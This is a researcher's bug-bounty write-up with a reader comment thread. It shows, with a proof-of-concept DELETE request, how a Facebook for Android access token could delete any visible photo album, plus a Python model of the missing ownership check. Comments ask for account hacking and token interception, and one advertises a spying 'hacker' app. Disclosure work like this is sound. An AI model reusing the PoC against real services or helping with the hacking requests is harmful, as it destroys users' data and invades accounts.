What if your photos get deleted without your knowledge?

Obviously, that would be very disturbing, wouldn't it? This post is about a vulnerability I found which allowed a malicious user to delete any photo album on Facebook. Any photo album owned by a user, a page or a group could be deleted.


The Graph API is the primary way for developers to read and write user data; all Facebook apps today use it. In general the Graph API requires an access token to read or write user data. Read more about the Graph API here.
According to the Facebook developer documentation, photo albums cannot be deleted through the album node in the Graph API.
I tried to delete one of my own photo albums using a Graph API Explorer access token.
Request :-
DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=CAACEd…..MUZD

Response :-
{"error":{"message":"(#200) Application does not have the capability to make this API call.","type":"OAuthException","code":200}}


Why? Because the Graph API Explorer app doesn't have the capability to delete photo albums. But note the wording of the error message: it implies that some other application does have the capability to make this API call 😛
So I decided to try it with a Facebook for Android access token. Facebook's own mobile apps use the same Graph API, and their tokens belong to a first-party app that has extra capabilities third-party apps don't get. I took one of my own album IDs and my Facebook for Android access token and tried it.
Request :-
DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=<Facebook_for_Android_Access_Token>

Response:-
true
Album 518171421550249 got deleted 😀 So what's the next step? I took a victim's album ID (an album that was visible to me) and tried to delete it. I was very curious to see the result.
Request :-
DELETE /<Victim’s_photo_album_id> HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=<Facebook_for_Android_Access_Token>

Response:-
true
OMG 😀 the album got deleted! The API evidently checked that the app behind the token was allowed to delete albums, but not that the user behind the token owned the album. So I could delete any of your Facebook photo albums whose ID I could obtain, i.e. public albums or any album I could see 😛 lol 😀
I immediately reported this bug to the Facebook security team. They were very fast in identifying the issue, and a fix was in place less than 2 hours after they acknowledged the report.

Read more about obtaining a Facebook for Android access token in [Capture Android HTTP/HTTPS Traffic].

Final Proof Of Concept :-

Request :-
DELETE /<Victim’s_photo_album_id> HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=<Your(Attacker)_Facebook_for_Android_Access_Token>

If you aren't sure how to do it, please see this video [How I Hacked Your Public Facebook Photos].
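To make the missing check concrete, here is a small Python model of the album-deletion endpoint. It is an added example written for this page, not Facebook's code (the Graph API backend is not public), and everything about the server side is an assumption made for the illustration: tokens are looked up in a table mapping an access token to (app, user), "may this app delete albums?" is a per-app capability flag, and the token names, the victim album ID and the non-#200 error codes are made up. The vulnerable handler enforces only the app capability, which is what produced error #200 for the Graph Explorer token above; the hardened handler additionally requires that the user behind the token owns the album, the object-level authorization check the PoC shows was missing.

```python
"""Model of the authorization gap behind the album-deletion PoC.

Added illustration for this page, not Facebook's Graph API backend.
All server-side details (token table, capability flag, error codes
other than #200) are assumptions made for the example.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class TokenInfo:
    app_id: str   # the app the token was issued to
    user_id: str  # the user who authorised it


# Constructed sample data (assumed identifiers, except the album ID from the post).
TOKENS = {
    "GRAPH_EXPLORER_TOKEN": TokenInfo("graph_explorer", "attacker"),
    "ANDROID_TOKEN": TokenInfo("facebook_for_android", "attacker"),
}
APPS_WITH_ALBUM_DELETE = {"facebook_for_android"}  # first-party app only
ALBUMS = {
    "518171421550249": {"owner": "attacker"},  # attacker's own album (ID from the post)
    "victim_album_id": {"owner": "victim"},    # hypothetical victim album
}


def oauth_error(code, message):
    """Build an error body in the same shape as the response shown in the post."""
    return {"error": {"message": message, "type": "OAuthException", "code": code}}


def delete_album(album_id, access_token, albums, check_owner):
    """Handle DELETE /<album_id> with access_token=... against the `albums` table.

    check_owner=False reproduces the vulnerable behaviour described in the post;
    check_owner=True is the hardened version. Returns True on success or an
    error dict, mirroring the Graph API responses shown in the post.
    """
    token = TOKENS.get(access_token)
    if token is None:
        # 190 is used here for an invalid token; assumed code/message for the example.
        return oauth_error(190, "Invalid OAuth access token.")
    # App-level capability check: the only check the vulnerable path performs.
    if token.app_id not in APPS_WITH_ALBUM_DELETE:
        return oauth_error(200, "(#200) Application does not have the capability to make this API call.")
    album = albums.get(album_id)
    if album is None:
        return oauth_error(100, "Unsupported delete request.")  # assumed code/message
    # Object-level check that was missing: the token's user must own the album.
    if check_owner and album["owner"] != token.user_id:
        return oauth_error(200, "(#200) Permissions error")  # assumed message
    del albums[album_id]
    return True


def replay_post_steps(check_owner):
    """Replay the three requests from the post against a fresh copy of ALBUMS.

    Returns (explorer_result, own_album_result, victim_album_result, remaining_album_ids).
    """
    albums = {k: dict(v) for k, v in ALBUMS.items()}
    explorer = delete_album("518171421550249", "GRAPH_EXPLORER_TOKEN", albums, check_owner)
    own = delete_album("518171421550249", "ANDROID_TOKEN", albums, check_owner)
    victim = delete_album("victim_album_id", "ANDROID_TOKEN", albums, check_owner)
    return explorer, own, victim, sorted(albums)


if __name__ == "__main__":
    for mode, flag in (("vulnerable", False), ("fixed", True)):
        print(mode, replay_post_steps(flag))
```

Run as a script it prints the vulnerable replay (explorer token rejected with #200, both the attacker's own album and the victim's album deleted, nothing left) and then the fixed replay (the victim's album survives with a permissions error). The point to take from it is that an app-level capability check is not an authorization decision about the object: the hardened path must compare the resource owner against the principal the token actually represents.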

 


Facebook acknowledged the fix and rewarded me $12,500 USD for reporting this vulnerability.


Now, this vulnerability is completely fixed.

I thank Facebook Security Team for running bug bounty program and also for quickly fixing this issue 🙂

HALL OF FAME: https://www.facebook.com/whitehat/thanks
Topping the list 😀

Laxman Muthiyah Facebook Whitehat Hacker Updated List 2015
  • raj

    Nice, congrats man.
    So it was your blog, ah?

  • great..

  • So Great keep Hunting 🙂

  • Congrats man… keep it up..

  • How do you get Facebook for Android access token?

    • You can get it by intercepting Facebook mobile application requests.

    • Can anyone tell how to intercept mobile app request?or some good tutorial post on it will be helpful…

    • I think a simple MITM with Wireshark would do. Search for both and you'll find plenty of tutorials

  • Congratulations, you should have been hired by facebook

  • 100

  • Great job bro, keep up the good work 🙂

  • Scary bug but good that it got fixed

  • Can you tell me the name of the chrome plugin please? I like the background on google

  • So cool. Great find Laxman!

  • Isn't there a zero missing from the bounty amount, for such a potentially disastrous bug?

  • Can you please name the Chrome plugin for web developers?

  • nice work!

  • Awesome job.

  • Congratulations and well done.

  • can you hack an account?

  • congratulations! great job

  • You really are good, doing great work


  • Hi

    I am working on one project named http://www.seestatus.com; this is also a social network website. Can we work together? We need a person like you. My number: 07044283747

  • Great work, Keep it up.

    • Thank you Rafay Baloch 🙂 Glad to hear from you 🙂


  • Great work bro, congrats! Thank you, you will be a great inspiration to upcoming students to find bugs and become whitehats.

  • Do you know how I could verify my Facebook page?

  • Better call Saul!

  • Very awesome! Do you have any other tutorials or tips on how to hack. I'm new to this topic but very curious, seems fun.

    • Hopefully I'll be posting soon. Stay tuned 🙂

  • I was surprised my cover photo was mysteriously gone–from my personal profile and page. I suspected it was an error…Thanks for updating the Facebook team. #Peace

  • How did you send this bug to Facebook???
    There is an option called "report problem"; if we send any message, they are not responding …

  • Great work …Congrats …

    • Thank you 🙂

      • This is the perfect way to break down this information.

  • Great Discovery Bro, You inspire so many of us who want to do the same. Keep it up, Hope to Connect with you soon.

  • Which software did you use to intercept Facebook mobile's traffic? Fiddler or Wireshark maybe?

  • Hi! I'm an Uruguayan journalist and I'd like to ask you some questions. Can you tell me your e-mail? Thank you very much.

  • It's time to find out who your hypocritical friend is, who speaks badly of you, whether your boyfriend/girlfriend is faithful to you; with this application you can keep watch over your children's Facebook and prevent kidnappings, rapes and more. Many have already used the application and claim it works 100%. What are you waiting for? Clear up your doubts now.

    *APPLICATION PAGE: http://donhacker.com/ *

  • Great job […] it…

  • Good luck

  • Awesome job bro…

    I'm very happy hearing that there are some good whitehats in India also..
    Congrats..

    Can you suggest me some great free online learning places for web development???

  • But my albums are getting deleted as soon as I post them! Please help.

  • Excellent work, I would not want to quarrel with you;) Have you received an award from Facebook?

  • Wow, so simple but so nice! It's incredible… I mean, of course you're really smart and this was a great hack, but everybody could do this in a few hours without a huge knowledge! That's so surprising!
    You were also able to delete posts and publish, right?

  • Amazing

  • I hack but cannot delete 🙁

  • Anonymous

    Laxman, which subject did you study in college?

  • Anonymous

    How do you get an access token which never expires? Mine expires in one hour.

  • Anonymous

    Hello , I have this error: HOST: ……………….. PORT: ……………….

  • Hello.. I'm in a big problem and I hope I will get a solution from this site.. Actually my friend's Facebook profile has been hacked.. Somebody has created a public page with her name which contains all her pictures and posts.. Every time she posts or puts pictures on her Facebook page, that public page also does the same.. That page is not genuine and contains very bad comments.. And the big problem is it contains my picture too.. I want to know how to delete my picture from that page because I don't want it to remain there.. Also how can we delete that page?? Please help me.. This is big trouble for a girl..

  • Where is Laxman now?


  • Anonymous

    Virtually, you can use this method to delete any photo album that belongs to a user who has registered with your Facebook app, not any Facebook user.

  • Nice find. Keep inspiring people. 🙂 I have one silly question; hope I will get the answer. I cannot understand how it is showing "Facebook for Android" with an app ID in the APP ID section on your access token page.
    I actually created one Facebook page long back and it is showing that page's app ID on the access token page.

  • My photos have been deleted like this… Please help me to get them back please

  • Anonymous

    Cipto Junaedy Seminar, come on! Learn business the Cipto Junaedy way, "Pioneer of the Buy Property Without Debt Strategy", who was named Best Public Servant in the Field of Business.

  • Hi,

    I am new to bug bounty. Can you tell me how you intercepted using Burp Suite? Facebook does not allow me to use Burp Suite; it gives an invalid certificate.

  • Joey stawlen

    Laxman, great job. You did a pretty good job. Just FYI, next time if you have to test something and find hidden or not so easily traceable bugs, I would suggest using the following tool.

    https://www.qualitestgroup.com/etl-data-warehouse-testing/

  • kasiya

    How to hack Facebook

    • FaRaz Khan

      Hacking web jh87a a8i7d88ad

  • ibeabella

    Please help me hack the FB account of the crab-mentality people… posting negative things about me… thanks

  • FaRaz Khan

    Plz plz hack website